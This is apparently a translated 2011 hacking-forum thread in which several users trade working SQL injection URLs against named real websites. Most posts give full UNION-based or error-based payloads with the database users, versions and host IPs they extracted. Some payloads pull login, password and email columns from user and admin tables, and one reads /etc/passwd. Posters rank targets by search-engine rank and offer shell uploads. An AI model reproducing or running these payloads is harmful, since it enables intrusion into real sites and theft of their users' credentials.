View full version: SQL Injections
http://uprava.org/section.php?id=19&sub_id=-167%20and%201=2%20union%20select%201,2,3,4,concat_ ws(0x3a,@@version,user(),database(),@@version_comp ile_os)+--
4.0.27-log uprava-org@fhe2.hoster.ru uprava-org portbld-freebsd7.0
PHP:
http://eurozvuk.ru/gallery/index.php?id=999999.9%27+UNION+ALL+SELECT+concat%2 80x7e%2C0x27%2Cunhex%28Hex%28cast%28database%28%29 +as+char%29%29%29%2C0x27%2C0x7e%29%2C0x31303235343 830303536%2C0x31303235343830303536+and+%27x%27%3D% 27x
Target: http://eurozvuk.ru/gallery/index.php?id=2384
Host IP: 77.222.40.186
Web Server: Apache/2.0.63-lk.d (Unix) mod_ssl/2.0.63-lk.d OpenSSL/0.9.8o mod_dp20/0.99.2 mod_python/3.3.1 Python/2.6.6 mod_ruby/1.2.6 Ruby/1.8.7(2010-08-16) mod_wsgi/3.3
DB Server: MySQL >=5
Resp. Time(avg): 475 ms
Current User: eurozvuk@localhost
Sql Version: 5.1.50-lk-log
Current DB: eurozvuk
System User: eurozvuk@localhost
Host Name: mesa
Installation dir: /usr/
Yandex TIC (CY) 70
Google PageRank (PR) 3
PHP:
http://gretta.ru/catalog/card.php?cat=palio&id=999999.9%27+UNION+ALL+SELECT+concat%280x7e%2C0x 27%2Cunhex%28Hex%28cast%28database%28%29+as+char%2 9%29%29%2C0x27%2C0x7e%29%2C0x31303235343830303536% 2C0x31303235343830303536%2C0x31303235343830303536% 2C0x31303235343830303536%2C0x31303235343830303536% 2C0x31303235343830303536--+a
Target: http://gretta.ru/catalog/card.php?cat=palio&id=1636
Host IP: 78.110.50.127
Web Server: Apache
DB Server: MySQL >=5
Resp. Time(avg): 205 ms
Current User: icy0u3fz_gal2@c25-w.ht-systems.ru
Sql Version: 5.0.85-log
Current DB: icy0u3fz_gal2
System User: icy0u3fz_gal2@c25-w.ht-systems.ru
Host Name: db14.ht-systems.ru
Installation dir: /usr/local/
DB User: 'icy0u3fz_gal2'@'%'
Data Bases: information_schema
icy0u3fz_gal2
Yandex TIC (CY) 100
Google PageRank (PR) 2
PHP:
http://landscrona.ru/tales/index.php?id=999999.9+UNION+ALL+SELECT+0x313032353 43830303536%2C0x31303235343830303536%2Cconcat%280x 7e%2C0x27%2Cunhex%28Hex%28cast%28database%28%29+as +char%29%29%29%2C0x27%2C0x7e%29%2C0x31303235343830 303536%2C0x31303235343830303536%2C0x31303235343830 303536%2C0x31303235343830303536%2C0x31303235343830 303536%2C0x31303235343830303536%2C0x31303235343830 303536%2C0x31303235343830303536%2C0x31303235343830 303536%2C0x31303235343830303536%2C0x31303235343830 303536%2C0x31303235343830303536%2C0x31303235343830 303536--
Target: http://landscrona.ru/tales/index.php?id=125
Host IP: 93.100.182.251
Powered-by: PHP/5.2.6-1+lenny10
Web Server: lighttpd/1.4.19
DB Server: MySQL >=5
Resp. Time(avg): 325 ms
Current User: ultrspru_data@localhost
Sql Version: 5.0.51a-24+lenny5
Current DB: ultrspru_data
System User: ultrspru_data@localhost
Host Name: landscrona
Installation dir: /usr/
DB User: 'ultrspru_data'@'localhost'
Data Bases: information_schema
ultrspru_data
Yandex TIC (CY) 160
Google PageRank (PR) 3
PHP:
http://resurs.ua/index.php?id=2&more=21+and%28select+1+from%28select+count%28*%29% 2Cconcat%28%28select+%28select+concat%280x7e%2C0x2 7%2Cunhex%28Hex%28cast%28database%28%29+as+char%29 %29%29%2C0x27%2C0x7e%29%29+from+information_schema .tables+limit+0%2C1%29%2Cfloor%28rand%280%29*2%29% 29x+from+information_schema.tables+group+by+x%29a% 29+and+1%3D1
Target: http://resurs.ua/index.php?id=2&more=21
Host IP: 91.197.128.231
Powered-by: PHP/5.2.13
Web Server: lighttpd/1.4.26
DB Server: MySQL error based
Resp. Time(avg): 80 ms
Sql Version: 5.0.77
Current DB: resursbase
Host Name: amgroup01.art-hosting.net.ua
Installation dir: /usr/
Yandex TIC (CY) 30
Google PageRank (PR) 2
There's a DB here with logins and passwords in plaintext. Enjoy. Came across a couple of e-mail addresses with pretty cool domains XD
http://www.benzrealty.com.au/content.php?page_id=-8+/*!UnIon+selECt+version%28%29*/
5.1.52
Cennarios
07.06.2011, 21:15
crime-maps.org
http://crime-maps.org/documentation_centre/centre/newsletter/newsletter_issue.php?i_=-45+union+select+1,concat%28file_priv,0x3a3a,User%2 9,3+from+mysql.user+limit+0,1--+&a_=395
This is how we guess an existing table:
http://www.photoindustria.ru/?mod=contest&id=14+union+select+null,null,null,null,null,null+f rom+ABCDEF
If ABCDEF is replaced with USERS, the query goes through.
Next we guess the columns:
http://www.photoindustria.ru/?mod=contest&id=14+union+select+users.pass,null,null,null,null, null+from+users
If you write password instead of pass, the query goes through.
Code:
http://www.cms.it/prodotti.php?lang=eng&pc=-49+union+select+1,2,3,4,5,6,7,8,concat_ws%280x3a,v ersion%28%29,database%28%29,user%28%29,@@version_c ompile_os%29,10,%2011,12,13,14,15,16,17,18,19,20,2 1,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37, 38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54 ,55,56,57,58,59,60,61,62,63,64+--+
winstrool
09.06.2011, 04:25
pr5 TIC 20
http://www.fenetreeurope.com/php/page.php?section=actu&id=-21190%27+union+select+1,2,3,4,concat_ws%280x3a,use r%28%29,version%28%29,database%28%29%29,6,7+--+
fenetreeurope@localhost:5.0.45:dbfenetreeurope
pr1
http://buket-iz-konfet.com.ua/pages.php?page=14+union+select+1,2,3,concat_ws(0x3 a,user(),version(),database())+--+
buketizkonfet@localhost:5.1.51:buketizkonfet
pr2
http://tonometr-shop.com.ua/pages.php?page=13+union+select+1,2,3,concat_ws%280 x3a,user%28%29,version%28%29,database%28%29%29--
buketizkonfet@localhost:5.1.51:buketizkonfet
http://www.kharkovapartment.com.ua/order.php?id=17000+union+select+1,concat_ws%280x3a ,user%28%29,version%28%29,database%28%29%29+--+
kharkovapartment@localhost:4.0.27:kharkovapartment
https://www.davidrayrobinson.com/order.php?id=-1+OR+%28SELECT+COUNT%28*%29+FROM+%28SELECT+1+UNION +SELECT+2+UNION+SELECT+3%29x+GROUP+BY+CONCAT%28MID %28%28select+concat_ws%280x3a,user%28%29,version%2 8%29,database%28%29%29%29,1,63%29,+FLOOR%28RAND%28 0%29*2%29%29%29--+
drobinson@localhost:5.0.27:business_data
http://www.mogilev.biz/company/?r=-17%20and%201=2%20union%20select%201,2,3,4,5,6,7,8, 9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25, 26,27,28,29,30,31,32,concat_ws(0x3a,@@version,user (),database(),@@version_compile_os),34,35,36,37,38 ,39,40,41,42,43,44,45,46,47,48,49,50--
5.1.44-community-log shuniamogilev@localhost mogilevbiz_mogilev unknown-linux-gnu
SpaceMan
09.06.2011, 22:00
http://www.white-ship.ru/index.php?id=7-999.9+union+select+1,2,3,version%28%29,5,6,7,8,9,1 0--
output in the Title
SergioRezza
10.06.2011, 10:55
Code:
http://www.be-on.net/products.php?id=-230+union+select+1,2,version(),4,5,6,7,8,9,10,11,1 2,13,14,15,16,17--
Code:
http://www.dfki.de/lt/card.php?id=-94+union+select+1,2,3,version(),5,6,7,8,9,10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,2 9,30--
Code:
http://housewives.org.ua/text.php?id=-692+union+select+1,2,3,4,version()--
Code:
http://jericho.org.ua/text.php?id=-682+union+select+1,2,3,4,version()--
Code:
http://www.tradevoyage.by/new.php?id=-142+union+select+1,2,3,4,version(),6,7,8,9,10--
Code:
http://www.thaiware.com/main/info.php?id=-2955+union+select+1,2,version(),4,5,6,7,8,9,10,11, 12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 ,29,30,31,32,33,34,35--
Code:
http://bolshevik-bowling.com.ua/info.php?id=-2+union+select+1,2,version()--
Code:
http://www.microchip.by/info.php?id=-1106+union+select+1,2,3,version(),5--
Code:
http://www.gammabook.ru/news.php?id=-82+union+select+1,concat_ws(0x3a,id,name,password) ,3,4,5,6+from+users--
Code:
http://www.stinkyjournalism.org/editordetail.php?id=-671+union+select+1,concat_ws(0x3a,admin_id,admin_n ame,admin_pwd),3,4,5,6,7,8,9,10,11,12,13,14,15,16, 17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+from+ admin--
Code:
http://www.garo.cc/item.php?id=-879+union+select+1,2,version(),4,5,6,7,8,9,10,11,1 2
Code:
http://www.noborder.org/item.php?id=-383+union+select+1,version(),3,4,5,6,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27--
I'll post the "juicy" ones later
SergioRezza
10.06.2011, 11:32
http://adu.org.za/staff_page.php?staff_id=-31+union+select+1,2,3,4,5,6,version(),8,9,10,11,12 ,13,14,15--
http://www.jumbocast.net/staffdetails.php?staff_id=-2+union+select+1,2,3,version(),5,6,7,8,9,10,11--
http://www.milim.com/gallery.php?id=-163+union+select+1,version(),3,4--
Jobs and vacancies in Belgorod
http://www.r31-rabota.ru/index.php?id=-75%20and%201=2%20union%20select%201,2,concat_ws(ch ar(58),@@version,user(),database(),@@version_compi le_os),4+--
5.1.54 r31-rabota@localhost r31-rabota portbld-freebsd8.1
winstrool
10.06.2011, 15:35
pr3 TIC 10
http://www.ticketon.ru/places.php?id=15700000000+union+select+1,concat_ws %280x3a,user%28%29,version%28%29,database%28%29%29 ,3,4,5,6,7,8+from+sbilet_users+--+
u73487@10.8.0.216:5.0.90-log:u73487
pr3 TIC 60
http://mospf.ru/order.php?id=-1+union+select+1,concat_ws%280x3a,user%28%29,versi on%28%29,database%28%29%29,3,4,5+--+
mospf_ru@zvm7.host.ru:5.0.92-log:mospf_ru
http://www.antiquesincanada.com/shop.php?myID=-398 union select 1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23
http://www.lifesaving.org/image_shop_lrg.php?article_id=-41 union select 1,version()--+
A referer from the site is required.
http://www.karmavore.ca/shop.php?pcatid=7&cat=-87 union select version()--+
http://www.flyermall.com/community/msg_preview.html?cid=-15%20union%20select%201,version%28%29,3--+
SergioRezza
11.06.2011, 15:32
http://www.simbin.se/news.php?newsid=-153+union+select+1,concat_ws(0x3a,ID,USERNAME,PASS WORD),3,4,5+from+USERS+where+ID=15--
nemaniak
12.06.2011, 02:49
virtualjerusalem.com PR-7
Code:
http://www.virtualjerusalem.com/news.php?Itemid=3147+and+substring((select+version ()),1,1)=5+--+
njsa.com PR-5
Code:
http://www.njsa.com/memoview.php?newsid=-194+union+select+1,2,3,4,concat_ws(version(),user( ),database()),6,7,8,9,10+--+
Code:
70776_njsa@lnh-www1e.bluehalo.myregisteredsite.com5.0.7770776_njs a
bloodAngel
12.06.2011, 15:18
Code:
http://www.ashbyschool.org.uk/news/news_view.php?id=105-999.9+union+select+1,version%28%29,database%28%29, 4,5,6,7,8--
4.1.22-log ashbyschooldb
PR 4
Code:
http://www.javaportal.ru/books/aboutbook.php?id=30-999.9+union+select+1,database%28%29,version%28%29, 4,5,6,7,8,9,10,11,12--
TIC 100 PR 4
Code:
http://www.globalfutureevents.com/event.php?id=-487+union+select+1,2,3,version(),database(),user() ,7--
5.1.57 / fesu_db / fesu_usr@localhost
TIC 10 PR 3
SergioRezza
12.06.2011, 16:58
http://colortek.by/show.php?id=434&t=-13+union+select+version()--
http://www.chgk.com.ru/person.php?id=-49+union+select+1,2,concat_ws(0x3a,name,pass),4,5, 6,7+from+user--
http://lit.phil.pu.ru/person.php?id=-1+union+select+1,2,3,4,5,6,concat_ws(0x3a,name,pas sword),8+from+users--
http://hotel-escort.ru/person.php?id=-59+union+select+1,2,3,4,version(),6,7--
http://www.mebelinfo.ru/base.php?tip=4&id=-34+union+select+1,2,3,version(),5,6,7,8,9,10,11,12 ,13,14,15,16,17,18--
http://fikomed.ru/base.php?id=-8+union+select+1,2,version(),4,5--
http://www.riff-fanzine.com/InfoArticulo.php?idArticulo=63-999.9+union+select+1,version(),3,4,5,database(),7, 8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24--
SergioRezza
12.06.2011, 20:46
TIC 30
http://stairsoflove.ru/write.php?id=-36271+union+select+1,2,3,version(),5,6--
TIC 10
http://heartmir.ru/write.php?id=-360+union+select+1,version(),3,4,5--
TIC 30
http://moy-snegovik.ru/write.php?id=-11910+union+select+1,2,3,version(),5,6--
TIC 10
http://www.usadiba.ru/dom.php?id=-468+union+select+version(),2,3,4,5,6,7,8--
Computer and youth slang and jargon
Code:
http://slanger.ru/?mode=library&sl_id=-1095+union+select+1,table_name,3,4,5,6,7+from+info rmation_schema.tables+--+
TIC: 30 PR: 3
Output below the date
Code:
http://www.worstpreviews.com/headline.php?id=-16827+union+select+1,2,3,version(),5,6,7,8+--+
Can't take this one further
Code:
http://www.vizzed.com/vizzedboard/thread.php?id=4290'
Code:
http://tajik-gateway.org/index.phtml?lang=ru&id=-535+union+select+version(),2--+
Code:
http://kluchbulgaria.com/index.php?menu=12&lang=ru&id=1246+union+select+1,2,version(),4,5--+
Code:
http://stylink.ru/kolgotky/index.html?action=sl&id=5258+UnIon+selECt+1,2,3,version(),5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19--+
Code:
http://stroika.md/detail.php?id=1+UnIon+selECt+1,version(),3,4,5,6,7 ,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24, 25,26,27,28--+
Code:
http://tdlotos.com.ua/prod.php?id=-447+UnIon+selECt+1,concat_ws(0x3a,email,password), 3,4,5,6,7,8,9,10,11,12,13,14,15+from+users--+
Code:
http://russtyle-yug.ru/catalog.php?id=59302%27+union+select+concat_ws(0x3 a,login,pass),2+from+tbl_users--+
Code:
http://prokatavto.com.ua/index.php?page=order&id=42+UnIon+selECt+1,2,3,group_concat(column_name) ,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+i nformation_schema.columns+where+table_name=0x68636 c5f6f70657261746f7273--+
Code:
http://julietta.com.ua/index.php?r=3&c=3&id=-84+union+select+version(),2--+
Code:
http://ulgaz.ru/index.php?mode=news&id=-184+union+select+concat_ws(0x3a,login,pass),2,3+fr om+users--+
Corporate site of OOO "Ulyanovskoblgaz"
http://www.semes.org/sociedades_detalle.php?id=-13+union+select+1,2,3,4,concat_ws(0x3a,user(),vers ion(),database())+from+information_schema.columns--
semes@localhost:5.0.51a-24+lenny5
http://www.north-southglobal.org/conferencias/info_organigrama.asp?ID=-1+union+select+*+from+msysobjects+in+'.'
http://www.2coma11.com/img_proyecto.php?id=-66+union+select+1,2,3,concat_ws(0x3a,user(),versio n(),database()),5--&refresh=
coma11@localhost:5.1.32-log:bdcoma11
http://www.tyeg.tw/web_news_c_2.php?top_id=-2019+union+select+1,2,3,4,5,6,7,8,9,0,11,12,13,14, 15,16,17,18,19,20,21,22,concat_ws(0x3a,user(),vers ion(),database()),24,25,26,27,28--
tyeg@localhost:5.0.77:tyeg
http://w3.tyh.com.tw/medweb/php/drugchange.php?id=-824+union+select+1,2,3,4,concat_ws(0x3a,user(),ver sion(),database()),6,7,8,9,0--
his@localhost:4.0.21-log:tyh
Cennarios
16.06.2011, 07:31
http://ozone.unep.org/new_site/en/notes.php?country_id=1%29+union+select+1,2,unhex%2 8hex%28user%28%29%29%29--+
http://www.mir-tv.ru/help.php?id=-2+UNION+SELECT+1,2,version%28%29,4--
5.1.41-log
http://www.position1.ru/index-1.php?id=-46+UNION+SELECT+1,2,3,version%28%29,5--
5.0.90
TIC CY 80
PR 2
http://www.bolshie.ru/help.php?id=-4+union+select+1,2,3,4,version%28%29--
5.0.90-log
SergioRezza
18.06.2011, 14:49
http://www.elportal.ru/stat.php?id=-62+union+select+version()--
TIC 20
5.0.85-log
_________________________________
http://www.facebookcounter.ru/stat.php?id=-1+union+select+1,2,3,version(),5,6,7,8,9--
5.0.91
________________________________
http://www.skladobzor.ru/stat.php?id=-23+union+select+version()--
TIC 10
5.0.85-log
_______________________________
http://www.pogruzchikservice.ru/index.php?t=stat&id=-4+union+select+version()--
TIC: 60
5.0.85-log
______________________________
http://www.itkt.ru/prod.php?id=-40+union+select+version()--
TIC: 40
4.1.25-log
Atarvala
18.06.2011, 17:56
http://penzlyk.com/biography.php?arts=10+and+1=0+union+select+concat_ ws(0x3a3a3a,user(),database(),version())+--+
kravchluba_baza@localhost:::kravchluba_penzlyk:::5 .0.67-community
http://www.plantdesignsolutions.com/news.php?id=12+uNiOn+all+seLeCT+1,2,3,COnCat_WS(0x 3a,version(),user(),database()),5,6,7,8
5.0.91-log: : plantdesignusr@97.74.24.46: : plantdesignusr
http://www.ibis.dk/presse/showarticle.php?id=-4256++UnIoN+AlL+sElEcT+CONCAT_WS(CHAR(32,58,32),us er(),database(),version())--
@localhost : ibis_web : 5.0.22-Debian_0ubuntu6.06.15-log
winstrool
18.06.2011, 23:20
here's some old stuff I had lying around))
TIC 30
http://www.captainsofcrush.ru/grippers/info.php?id=-13+union+select+1,concat_ws%280x3a,version%28%29,u ser%28%29,database%28%29%29,3,4,5,6,7,8+--+
5.0.91-community:captains_crush@localhost:captains_crush
pr2 TIC 20
http://www.medium-plus.ru/print.php?in=-22+union+select+concat_ws%280x3a,user%28%29,versio n%28%29,database%28%29%29,2,3+--+&ac=info&m1=2&m2=6
medium-plus@localhost:5.0.77:medium-plus
pr4 TIC 140
http://www.itrex.ru/index.php?option=com_itrexptc&ptcPage=tr&id=-707%27+and+1=1+OR+%28SELECT+COUNT%28*%29+FROM+%28S ELECT+1+UNION+SELECT+2+UNION+SELECT+3%29x+GROUP+BY +CONCAT%28MID%28%28select+concat%28user%28%29,0x3a ,version%28%29,0x3a,database%28%29%29%29,1,63%29,+ FLOOR%28RAND%280%29*2%29%29%29+--+
itrexru@localhost:5.0.77:itrex_db
http://www.gumata.com/product.php?id=-47+union+select+concat_ws%280x3a,user%28%29,versio n%28%29,database%28%29%29+--+
gumata_gumata@localhost:5.0.92-community:gumata_gumata
pr6 TIC 190
http://ndce.edu.ru/publ_info.php?id=-78+union+select+concat_ws%280x3a,user%28%29,versio n%28%29,database%28%29%29,2,3,4,5,6,7,8,9,0,11,12, 13,14,15,16--
lab130@localhost:5.0.91-log:catalogue
FILE_PRIV=Y
pr4
http://www.ditc.us/news-events/articles/article.php?id=-100+union+select+1,2,3,4,5,concat_ws%280x3a,user%2 8%29,version%28%29,database%28%29%29,7,8,9,0,11,12 ,13,14,15,16,17,18,19,0,21,22,23,24--
ditcus@76.12.19.204:5.0.27-standard:ditcus
TIC: 160 PR 4
http://www.nukri.org/index.php?module=Recipes&func=display&lid=-4+union+select+1,unhex%28hex%28concat_ws%280x3a,us er%28%29,version%28%29,database%28%29%29%29%29,3,4 ,5,6,7,8,9,0,11,12,13,14,15,16,17,18+--+
nukri2@localhost:4.1.18-standard:db_nukri2
1500 unique visitors per day
pr5
http://www.thecis.ca/index.php?catID=38&itemID=4690000000+union+select+1,2,concat_ws%280x3 a,user%28%29,version%28%29,database%28%29%29,4,5,6 ,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22,23+--+
cistudies@localhost:5.1.56-rs:cistudies
pr1
http://www.yaptik.biz/modules/articles/article.php?id=114+union+select+1,2,3,4,5,6,concat _ws%280x3a,user%28%29,version%28%29,database%28%29 %29,8,9,0,11,12,13,14,15,16,17,18,19,20--
ycolasan_biz@localhost:5.1.54-log:ycolasan_biz.
pr5
http://www.baltwashchamber.org/content.php?sid=2&id=50&content=3&parentid=65+union+select+1,concat_ws%280x3a,user%2 8%29,database%28%29,version%28%29%29+--+
bwcctest@204.13.10.22:aimstar_bwcccms:5.1.24-rc-log
pr3 TIC 30
http://www.svvm-auto.ru/info.php?id=-11+union+select+1,2,3,4,concat_ws%280x3a,user%28%2 9,database%28%29,version%28%29%29,6,7+--+
zorro_svvm@localhost:zorro_svvm:5.0.51a-24+lenny4-log
Cennarios
19.06.2011, 04:31
It worked out! =)
http://www.iaea.org/nael/page.php?page=2125&recordID=-28/**//*!union*//**//*!select*//**/1,user%28%29,3,4,5,6,7,8,9,10--+
http://stepstation.com/posts.php?category=-11+union+select+1,concat_ws(0x3a,email,password),3 ,4,5+from+users--
---
http://www.estatefiesolana.it/index.php?id=-597+union+select+1,concat_ws(0x3a,user,password),3 ,4,5+from+mysql.user--
winstrool
19.06.2011, 16:52
TIC 50
http://www.talas-m.ru/info.php?id=-9+union+select+1,2,concat_ws%280x3a,user%28%29,ver sion%28%29,database%28%29%29,4,5+--+&t=resort
talasm01@localhost:5.1.56-log:wwwtalasmru_talasm01
TIC 10 pr2
http://www.otalant.ru/info.php?id=-7%27+union+select+1,2,3,4,5,concat_ws%280x3a,user% 28%29,version%28%29,database%28%29%29,7,8,9,0,11,1 2,13,14,15,16,17+--+
akademiach@localhost:5.0.26-lk-log:akademiach
TIC 20
http://www.vetclin.ru/article.php?id=-2%27+union+select+1,2,concat_ws%280x3a,user%28%29, database%28%29,version%28%29%29+--+
zubov@localhost:zubov517:5.0.67
TIC 40 pr3
http://www.itkt.ru/prod.php?id=-40+union+select+concat_ws(0x3a,user(),version(),da tabase())+--+
itktru99_itkt@localhost:4.1.25-log:itktru99_itktru
Code:
http://topnexia.ru/arcticles.php?id=-41+union+select+1,version%28%29,3,4,5+--+
version: 5.0.26-log
database: allesistgu_nexia
user: allesistgu_nexia@localhost
TIC: 10 | pr: 1
Code:
http://studyincors.ru/country.php?id=-1+union+Select+1,concat_ws%280x3a3a,version%28%29, database%28%29,user%28%29%29,3,4,5,6,7,8,9,10,11,1 2,13,14,15,16,17,18,19+--+
version: 5.0.77-log
database: azanova_edu
user: azanova_edu@bitrix54.timeweb.ru
TIC: 0 | pr: 0
Code:
http://www.earthburg.ru/earthadm/php/process.php?lang=r&c1=10&id=-1+union+select+concat_ws%280x3a3a,version%28%29,da tabase%28%29,user%28%29%29,2,3+--+
version: 5.0.92-log
database: earthbu6_earthburgnew
user: earthbu6_me@localhost
TIC: 50 | pr: 3
Code:
http://eti.stankin.ru/index.php?table=grcms_post_menu&id=-1+union+select+1,2,3,4,concat_ws%280x3a,version%28 %29,database%28%29,user%28%29%29+--+
version: 5.1.28-rc
database: eti
user: eti@localhost
TIC: 10 | pr: 2
Alcohol abuse is dangerous to your health!
http://tatspirtprom.ru/production/catalog/balzami/balzami_30.html?template=-18%20and%201=2%20union%20select%201,2,3,4,concat_w s(0x3a,@@version,user(),database(),@@version_compi le_os),6,7--
5.0.83 u01586_tsp_ru@localhost u01586_tsp_ru portbld-freebsd6.4
SergioRezza
20.06.2011, 13:35
http://www.cmbc.ru/process.php?ID=1%27%20AND%201%3D2+UNION+SELECT+ver sion(),2,3+%23
TIC 110
PR 3
http://in-green.com.ua/product_info.php?products_id=1124+and+0=1+union+se lect+version()--
5.0.51a-24+lenny4-log
TIC 50
PR 3
//Hashes and passwords are prohibited!
http://www.modflame.com/store.php?rid=-1+union+select+1,2,group_concat(email,':',password ),4,5+from+users;+--+
SergioRezza
20.06.2011, 17:48
http://www.tennis-piter.ru/ban.php?id=-116+union+select+1,2,3,4,version()--
PR: 3
TIC: 210
ip: 38.101.219.98
sites on the same IP,
Code:
http://lurkingnoob.com/file.php?id=-76+UnIoN+ALL+SeLeCt+1,2,3,concat_ws(0x3a,@@version ,user(),database(),@@version_compile_os),5,6,7
5.1.37-1ubuntu5.4-log:broorho@localhost:ringtones:debian-linux-gnu
http://omfgif.com/gif.php?id=-9999999+AND+1=0+UNION+SELECT+0,1,2,3,4,5,6,7,8,9,l oad_file(0x2f6574632f706173737764),11,12--
http://mediafetcher.com/article_full.php?id=888888888888888+UnIoN+ALL+SeLe Ct+1,2,3,4,5,concat_ws(0x3a,@@version,user(),datab ase(),@@version_compile_os),7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28
5.1.37-1ubuntu5-log:uselessj_ohshitw@localhost:uselessj_uj2006:deb ian-linux-gnu
http://swagster.com/img.php?id=-242215+UnIoN+ALL+SeLeCt+1,2,3,4,5,6,7,version(),9, 10,11,12
5.1.37-1ubuntu5.1-log
http://www.broorho.com/image.php?uid=-13381+UNION+SELECT+1,version(),3,4,5
5.1.37-1ubuntu5-log
TABLES (http://pastebin.com/kcgDj3uT)
Yandex TIC 3400
Google PageRank 9/10
Code:
http://www.stanford.edu/group/spatialhistory/cgi-bin/site/page.php?id=-83+union+select+1,unhex(hex(table_name)),3+from+in formation_schema.tables+limit+41,9+--+
Yandex TIC 10
Google PageRank 5/10
Code:
http://www.bispublishers.nl/bookpage.php?id=-142+union+select+1,2,concat_ws(0x3a,name,password) ,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,2 2,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38, 39,40,41,42,43,44,45,46+from+users+--+
SergioRezza
22.06.2011, 00:18
http://www.apkhleb.ru/rus/press/news/?id=-1520+union+select+1,2,3,concat_ws(0x3a,id,login,pa ss,email),5,6,7,8+from+user+where+id=2--
PR: 4
TIC: 450
http://www.konditerprom.ru/list/list.php?cid=-1+union+select+1,version()--
PR: 4
TIC: 400
http://foodsmarket.info/wizard/view_unit.php?unit_num=1227%20%26%26%201%3D2%20UNI ON+SELECT+1,2,version(),4,5,6,7+%23
PR: 5
TIC: 400
http://www.agromage.com/stat_id.php?id=782%27%20AND%201%3D2%20UNION%20SELE CT%201%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2 C12%2C13%2C14%2C15%20%23
PR: 5
TIC: 400
http://www.meatmarket.info/statinter.php?id=220%20%26%26%201%3D2+UNION+SELECT +1,2,version(),4,5,6,7,8,9,10+%23
PR: 4
TIC: 240
http://www.yuk.ru/site/index/news.php?id=10%27%20AND%201%3D2+UNION+SELECT+1,2,v ersion(),4,5,6,7,8,9,10+%23
PR: 2
TIC: 180
I haven't taken any of these SQL injections further; maybe you'll be able to upload shells somewhere)))
http://henryyanart.com/product.php?id=-100+union+select+1,2,3,4,5,6,7,8,9,10,group_concat (id,txn_id,payment_amount,payment_currency,item_na me,receiver_email,payer_email)+from+purchases
http://floridashorestruckcenter.com/store/product.php?d=-100+union+select+1,2,3,4,5,6,7,group_concat(table_ name)+from+information_schema.tables+where+table_s chema!=0x696e666f726d6174696f6e5f736368656d61
SergioRezza
22.06.2011, 13:14
http://www.vkf.ru/index.php?action=prod&type=detail&id=-391+union+select+1,2,3,4,version(),6,7,8,9,10,11--
PR: 3
TIC: 170
http://www.1may.ru/news.php?p=27\'&n=35+and+1=2+union+select+version(),2,3--
PR: 3
TIC: 130
http://www.ukrkonditer.kiev.ua/commerce/package_page.php?packid=89%20%26%26%201%3D2+UNION+ SELECT+1,version(),3,4,5,6,7,8%23
PR: 4
TIC: 200
http://www.dverifortrez.ru/view_item.php?id=-294+union+select+1,2,3,4,version(),6,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28, 29,30--
PR: 4
TIC: 600
http://www.lumstyle.ru/company/news.htm?news_id=-38+union+select+1,2,3,4,version(),6,7--
PR: 0
TIC: 450
Need shells? PM me
VDobridze
22.06.2011, 17:42
metuchenchamber.com
PR4
Code:
http://www.metuchenchamber.com/news.php?article=yes&id=-123%27%20union%20select%201,2,3,4,5,concat_ws%280x 3a,version%28%29,user%28%29,database%28%29%29,7,8, 9,10,11%27
holod_velesagro
5.1.45
holod_velesagro@localhost
Code:
http://www.velesagro.com/product.php?id=-129+union+select+1,2,3,database(),version(),user() ,7,8,9,10,11,12,13,14,15,16,17,18,19,20--
PR: 2
TIC: 40
http://www.locosystech.com/product.php?id=-1+union+select+1,2,3,4,5,6,group_concat(table_name ),8,9,10,11,12,13,14,15,16+from+information_schema .tables+where+table_schema!=0x696e666f726d6174696f 6e5f736368656d61
TIC 10
Code:
http://sport-razgrom.ru/view_search.php?submit_s=%C8%F1%EA%E0%F2%FC&search=0')union(select(1),(2),3,4,concat_ws(0x3a,u ser,pass),6,7,8+from+userlist+limit+0,1)--+1
http://www.crest-gems.com/home.php?category_id=23+union+select+concat_ws(0x3 a,user_name,password),2,3,4,5+from+system_users--
pr 2
Agel Nash
23.06.2011, 16:42
http://www.sport-gym.ru/more.php?id=54&pid=0+UNION+SELECT+group_concat(TABLE_NAME)+%20FRO M%20INFORMATION_SCHEMA.TABLES%20--
http://www.mosteploseti.ru/index.php?idS=0+UNION+SELECT+1,@@version,3,4,5--
http://www.bainstuff.ru/shop.php?IDC=2&IDS=0+UNION+SELECT+1,2,3,99999999999999999--
http://www.rock-climbing.ru/text.php?ids=0+UNION+SELECT+99999999999999999999--
http://www.energostab.ru/help.php?ids=0+UNION+SELECT+1,group_concat(concat_ ws(%22:%22,login,password)),3,4,5+FROM+users--
http://www.sputnik-altai.ru/fotoalbum.php?p_id=-2+UNION+SELECT+1,1,1,1--
http://www.dinamo-altai.ru/fotoalbum.php?p_id=-2+UNION+SELECT+1,1,1,1--
http://www.alkor.regioninfo.ru/fotoalbum.php?p_id=-2+UNION+SELECT+1,1,1,1--
http://www.azkoyenrus.ru/question.phtml?&page=1&q_id=2&act=view&menu_id=2&qpart_id=0+UNION+SELECT+1,2,3,4,5,6,7--
http://www.infologics.ru/present/question.phtml?&page=1&q_id=2&act=view&menu_id=2&qpart_id=0+UNION+SELECT+1,2,3,4,5,6,7--
Look at the page titles
http://www.climatelab.ru/index.php?action=price&pid=2+UNION+SELECT+1,2,3,4,5,6,7,@@version,9,10,11--
http://www.evrokot.com/catalog.php?pid=0+UNION+SELECT+group_concat(COLUMN _NAME)+FROM%20INFORMATION_SCHEMA.COLUMNS--
PageRank 2
Code:
http://www.crystalcityrestaurant.com/cmspages.php?id=-1+union+select+1,concat%28FName,0x3e,password%29,3 ++from+admin--
Code:
